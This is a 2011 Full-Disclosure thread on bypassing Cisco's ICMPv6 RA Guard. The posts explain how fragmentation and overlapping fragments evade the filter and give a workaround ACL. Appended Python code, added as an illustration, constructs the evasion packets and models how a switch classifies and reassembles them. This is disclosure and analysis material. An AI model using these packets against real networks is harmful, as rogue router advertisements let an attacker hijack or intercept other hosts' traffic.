Message-ID: <20110523090708.GI24792@ernw.de>
Date: Mon, 23 May 2011 11:07:08 +0200
From: Enno Rey <erey@...w.de>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Bypassing Cisco's ICMPv6 Router Advertisement Guard feature
Hi,
some Wireshark excerpts on the attack Marc describes below can be found here:
http://www.insinuator.net/2011/05/yet-another-update-on-ipv6-security-some-notes-from-the-ipv6-kongress-in-frankfurt/
thanks
Enno
On Mon, May 23, 2011 at 10:49:05AM +0200, Marc Heuse wrote:
>
> To bypass the Router Advertisement Guarding feature in the (very few)
> Cisco switches (and images) that support it:
>
> Attack:
> =======
> Make the evil Router Advertisement fragmented and put the ICMPv6 into
> the second fragment, eg. by putting a very large Destination extension
> header before the ICMPv6 part.
>
> So the packets look like:
>
> Fragment 1:
> IPv6 Header
> Fragmentation Header
> Destination Header (~1400 bytes)
>
> Fragment 2:
> IPv6 Header
> Fragmentation Header
> Destination Header (continued with some bytes)
> ICMPv6 with RA
>
>
> Workaround:
> ===========
> To prevent this attack, put the following IPv6 ACL on all ports:
>
> deny ip any any undetermined-transport
>
> This will drop all packets where the switch is not able to identify the
> IPv6 transport type like in this attack. Note that this might drop some
> unusual valid traffic too.
>
>
> Workaround Bypass:
> ==================
> Craft the packets in a way so that the first fragment has an ICMPv6 echo
> request and the second fragment overwrites the first fragment with the
> ICMPv6 router advertisement.
>
> Fragment 1:
> IPv6 Header
> Fragmentation Header
> Destination Header (8 bytes)
> ICMPv6 with Echo Request
>
> Fragment 2:
> IPv6 Header
> Fragmentation Header with offset == 1 (equals position of 8th byte ==
> start of Echo Request in first fragment)
> ICMPv6 with RA
>
> Note that the handling of overlapping fragments differs between
> platforms, some take the first fragment received, others the latest, so
> send the packets accordingly to your target.
>
>
> Hackers win again. Sorry Cisco.
> Have fun with IPv6!
>
> Greets,
> Marc
>
> P.S. Cisco is informed, they "accept the risk" ...
> P.P.S. thc-ipv6 v1.6 was released 10 days ago :-)
>
> --
> Marc Heuse
> www.mh-sec.de
>
> Ust.-Ident.-Nr.: DE244222388
> PGP: FEDD 5B50 C087 F8DF 5CB9 876F 7FDD E533 BF4F 891A
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
--
Enno Rey
ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 174 3082474
PGP FP 055F B3F3 FE9D 71DD C0D5 444E C611 033E 3296 1CC1
Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey
=======================================================
Blog: www.insinuator.net || Conference: www.troopers.de
=======================================================
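As an added illustration of the two packet layouts in the quoted message (this is not code from Marc's or Enno's posts and not thc-ipv6 code), the Python below builds the fragmented RA with a ~1400-byte Destination Options header, the echo-request/RA overlap variant, a simplified per-fragment header walk of the kind a switch would have to do without reassembly, and a naive reassembler with a "first received wins" and a "last received wins" overlap policy. Addresses, fragment IDs, the RA field values and the 1232-byte fragment size are constructed for the demo; the `classify` walker models only the generic "can the transport be found in this packet" question, not how any particular switch or image actually treats fragment 2.

```python
"""Fragmented and overlapping ICMPv6 RA packets as described in the post.
All addresses, IDs and RA field values are constructed for this example."""
import struct

NH_DSTOPTS, NH_FRAG, NH_ICMPV6 = 60, 44, 58
SRC = bytes.fromhex("fe80" + "00" * 12 + "0001")  # fe80::1 (constructed)
DST = bytes.fromhex("ff02" + "00" * 13 + "01")    # ff02::1 all-nodes

def ipv6_hdr(nh, payload, src=SRC, dst=DST):
    # version 6, tc/flow 0, payload length, next header, hop limit 255
    return struct.pack("!IHBB", 0x60000000, len(payload), nh, 255) + src + dst + payload

def icmpv6_checksum(msg, src=SRC, dst=DST):
    # RFC 4443 checksum over the IPv6 pseudo-header plus the ICMPv6 message
    data = src + dst + struct.pack("!I3xB", len(msg), NH_ICMPV6) + msg
    if len(data) % 2:
        data += b"\0"
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF

def icmpv6(type_, body):
    msg = struct.pack("!BBH", type_, 0, 0) + body
    return msg[:2] + struct.pack("!H", icmpv6_checksum(msg)) + msg[4:]

def router_advertisement():
    # type 134: cur hop limit 64, flags 0, router lifetime 1800 s, reachable/retrans 0
    return icmpv6(134, struct.pack("!BBHII", 64, 0, 1800, 0, 0))

def echo_request():
    # type 128: identifier 0x1234, sequence 1 (constructed values)
    return icmpv6(128, struct.pack("!HH", 0x1234, 1))

def dest_opts(nh, total_len):
    """Destination Options header filled with PadN/Pad1 up to total_len bytes."""
    assert total_len % 8 == 0 and total_len >= 8
    pad, opts = total_len - 2, b""
    while pad > 0:
        n = min(pad, 257)                      # PadN carries at most 255 data bytes
        opts += b"\0" if n == 1 else bytes([1, n - 2]) + b"\0" * (n - 2)
        pad -= n
    return bytes([nh, total_len // 8 - 1]) + opts

def fragment(frag_payload, first_nh, frag_id, chunk=1232):
    """Split the fragmentable part into fragments; offsets are in 8-octet units."""
    frags = []
    for off in range(0, len(frag_payload), chunk):
        data = frag_payload[off:off + chunk]
        more = 1 if off + chunk < len(frag_payload) else 0
        fh = struct.pack("!BBHI", first_nh, 0, ((off // 8) << 3) | more, frag_id)
        frags.append(ipv6_hdr(NH_FRAG, fh + data))
    return frags

def attack_fragments():
    """Large Destination Options header pushes the RA into the second fragment."""
    return fragment(dest_opts(NH_ICMPV6, 1400) + router_advertisement(), NH_DSTOPTS, 0xDEAD)

def bypass_fragments():
    """Fragment 1: 8-byte Dest Opts + Echo Request; fragment 2 at offset 1 carries the RA
    and overlaps the Echo Request. The Fragment header's NH field names the first header
    of the fragmentable part (Dest Opts) in both fragments."""
    f1 = ipv6_hdr(NH_FRAG, struct.pack("!BBHI", NH_DSTOPTS, 0, (0 << 3) | 1, 0xBEEF)
                  + dest_opts(NH_ICMPV6, 8) + echo_request())
    f2 = ipv6_hdr(NH_FRAG, struct.pack("!BBHI", NH_DSTOPTS, 0, (1 << 3) | 0, 0xBEEF)
                  + router_advertisement())
    return [f1, f2]

def classify(pkt):
    """Walk one packet's header chain without reassembly. Returns the ICMPv6 type,
    the transport's next-header value, or 'undetermined-transport' when the chain
    cannot be resolved inside this packet (a simplified model of the ACL keyword)."""
    nh, pos = pkt[6], 40
    while True:
        if nh == NH_ICMPV6:
            return pkt[pos] if pos < len(pkt) else "undetermined-transport"
        if nh == NH_FRAG:
            if pos + 8 > len(pkt):
                return "undetermined-transport"
            fnh, _, off_m, _ = struct.unpack("!BBHI", pkt[pos:pos + 8])
            if off_m >> 3:                     # non-first fragment: headers start mid-stream
                return "undetermined-transport"
            nh, pos = fnh, pos + 8
        elif nh in (0, NH_DSTOPTS, 43):        # hop-by-hop, dest opts, routing
            if pos + 2 > len(pkt) or pos + (pkt[pos + 1] + 1) * 8 > len(pkt):
                return "undetermined-transport"   # header runs past this fragment
            nh, pos = pkt[pos], pos + (pkt[pos + 1] + 1) * 8
        else:
            return nh

def reassemble(frags, policy="first"):
    """Naive reassembly; overlapping bytes are kept from the first- or last-received fragment."""
    buf, total = {}, None
    for pkt in frags:
        fnh, _, off_m, _ = struct.unpack("!BBHI", pkt[40:48])
        off, more, data = (off_m >> 3) * 8, off_m & 1, pkt[48:]
        for i, b in enumerate(data):
            if policy == "last" or off + i not in buf:
                buf[off + i] = b
        if not more:
            total = off + len(data)
    return ipv6_hdr(fnh, bytes(buf[i] for i in range(total)))

if __name__ == "__main__":
    a, b = attack_fragments(), bypass_fragments()
    print("attack:", [classify(p) for p in a], "-> reassembled", classify(reassemble(a)))
    print("bypass:", [classify(p) for p in b], "-> first-wins", classify(reassemble(b, "first")),
          "last-wins", classify(reassemble(b, "last")))
```

Run stand-alone, the attack pair is `undetermined-transport` in both fragments yet an RA (type 134) once reassembled, which is exactly what the `deny ip any any undetermined-transport` ACL keys on; the overlap pair looks like an Echo Request (type 128) in fragment 1 and reassembles to type 128 or 134 depending on which fragment the target lets win, which is why the post says to order the fragments to suit the target's overlap handling.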